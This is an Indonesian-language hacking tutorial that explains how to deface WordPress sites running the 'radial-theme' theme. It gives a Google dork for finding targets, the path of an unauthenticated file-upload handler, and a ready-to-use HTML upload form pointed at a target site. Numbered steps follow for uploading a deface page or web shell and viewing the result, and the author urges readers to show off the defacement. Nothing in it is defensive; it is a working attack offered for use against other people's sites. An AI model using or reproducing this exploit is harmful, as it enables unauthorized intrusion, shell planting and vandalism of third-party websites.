Hey ho kali ini afik mau share tutor deface wordpress plugin theme radial
oke langsung aja eaaaa biar gak kelamaan
Bahan
1. dork : inurl:/wp-content/themes/radial-theme/ (kembangin lagi eaaaa)
2.exploit : /wp-content/themes/radial-theme/functions/upload-handler.php
3. csrf :
<form enctype="multipart/form-data"action="http://target.com/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="UPLOAD!" />
</form>
(copy csrf ke notepad /notepad ++, simpan dengan extensi html)
4. script deface / shell
oke kita langsung ke langkah2 nya
1. Dorking gugel dulu
2. kalo udah pilih salah satu site
3. masukan exploit di belakang nama site nya
contoh : www.target.com/wp-content/themes/radial-theme/functions/upload-handler.php
4. kalo vuln maka akan ada tulisan "error"
5. nah tinggal masukin site ke csrf kita tadi
6. buka csrf nya lewat web browser
7.upload deh script deface ato shell deface kita
8.kalo udah muncul file upload an kita
9. cara melihat hasil deface nya kek gini contoh yaa
site.com/wp-content/uploads/tahun/bulan/nama file
10. taraaaaa tampilan website nya pun berubah, tinggal pamerin ke temen lo deh :v kalo lo hekel awokawokawkok :v
oke sekian tutor dari gw, special thanks buat BERANDAL
kalo gk paham bisa lihat video nya di bawah sini